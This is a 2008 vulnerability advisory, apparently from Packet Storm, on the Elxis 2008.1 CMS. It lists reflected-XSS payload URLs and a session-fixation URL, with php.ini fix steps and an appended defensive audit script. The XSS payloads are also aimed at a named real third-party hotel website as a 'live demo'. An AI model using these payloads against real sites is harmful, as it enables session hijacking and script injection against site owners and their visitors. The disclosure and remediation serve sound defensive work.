elxis-xss.txt

14 Oct 2008 · Reported by swappie aka faithlove · Type: packetstorm · packetstormsecurity.com

Elxis 2008.1 Nemesis security vulnerabilities including XSS and session fixatio

Code
`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
################################################################   
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #  
# -C1c4Tr1Z -Gabitzu and all darkc0de members #   
;###############################################################   
#   
# Author: swappie [aka] faithlove   
#   
# Home : www.darkc0de.com  
#  
# Email : [email protected]  
#   
# Do researching and share!   
#   
;###############################################################   
#   
# Title: Elxis 2008.1 Nemesis  
#  
# Issue Date: Monday, 29 September 2008  
#  
# CMS Link: http://www.elxis-downloads.com/fserver/96.html  
  
# Vendor: http://www.elxis.org/  
#   
#  
;###############################################################  
#  
# Dork: I'm sure you can figure that by yourself, right?  
#  
#################################################################  
  
  
----------  
XSS Vulns;  
----------  
  
http://www.site.com/?>'"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>  
  
http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>  
  
----------  
Live Demo;  
----------  
  
http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>  
  
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>  
  
  
;==================================================================;  
;==================================================================;  
  
-----------------  
Session Fixation;  
-----------------  
  
  
http://www.site.com/?PHPSESSID=[session_fixation]  
  
Explanation:  
  
An attacker can fix the user's session ID before the user even logs on to  
the target server, so the attacker does not need to obtain the session ID  
afterwards.  
  
How to fix the "session fixation"?  
  
There is a simple way to do it.  
  
Step 1.  
  
Open the file named php.ini from your server.  
  
Step 2.  
  
Look through the file for the following lines:  
  
; This option enables administrators to make their users invulnerable to  
; attacks which involve passing session ids in URLs; defaults to 0.  
  
; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!!  
  
  
Step 3.  
  
=> [ and make it look like this: ]  
  
; This option enables administrators to make their users invulnerable to  
; attacks which involve passing session ids in URLs; defaults to 0.  
  
session.use_only_cookies = 1  
  
Step 4.  
  
Restart the web server, php, whatever.  
  
  
  
Cheers,  
  
swappie [aka] faithlove`
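
The php.ini change in Steps 1-4 can be checked with a small audit script; this is an added example, not part of the original advisory. It also checks `session.use_trans_sid` and `session.use_strict_mode`, which the advisory does not mention, and it reports an unset `session.use_only_cookies` as a finding, following the php.ini comment quoted above.

```shell
# ini_value FILE KEY: print the effective value of KEY, or "unset".
# A line starting with ";" is a comment, so a commented-out directive has no effect.
ini_value() {
    awk -v key="$2" '
        /^[ \t]*;/ { next }
        {
            line = $0
            sub(/[ \t]*;.*$/, "", line)            # drop a trailing comment
            n = index(line, "="); if (n == 0) next
            k = substr(line, 1, n - 1); v = substr(line, n + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", k)
            gsub(/^[ \t"]+|[ \t"\r]+$/, "", v)
            if (k == key) { val = v; found = 1 }   # last assignment wins
        }
        END { if (found) print val; else print "unset" }
    ' "$1"
}

# is_on VALUE: succeed when PHP reads VALUE as boolean true.
is_on() {
    case "$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')" in
        1|on|true|yes) return 0 ;;
    esac
    return 1
}

# audit_session_ini FILE: print one finding per line; exit status 1 if any.
audit_session_ini() {
    rc=0
    v=$(ini_value "$1" session.use_only_cookies)
    if ! is_on "$v"; then rc=1
        echo "session.use_only_cookies is $v: set it to 1 so a PHPSESSID in the URL is ignored"
    fi
    v=$(ini_value "$1" session.use_trans_sid)
    if is_on "$v"; then rc=1
        echo "session.use_trans_sid is $v: set it to 0 so PHP stops writing session IDs into links"
    fi
    v=$(ini_value "$1" session.use_strict_mode)    # directive exists in PHP 5.5.2 and later
    if ! is_on "$v"; then rc=1
        echo "session.use_strict_mode is $v: set it to 1 to reject IDs the server did not issue"
    fi
    return "$rc"
}

# Constructed sample: the Step 2 state, with the directive still commented out.
sample=$(mktemp)
printf '%s\n' '[Session]' '; session.use_only_cookies = 1' 'session.use_trans_sid = 0' > "$sample"
audit_session_ini "$sample" || true
rm -f "$sample"
```

Run `audit_session_ini` against the php.ini that the web server's PHP actually loads, since CLI and web SAPIs often read different files.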

Vulners AI Score: 7.4 (High risk)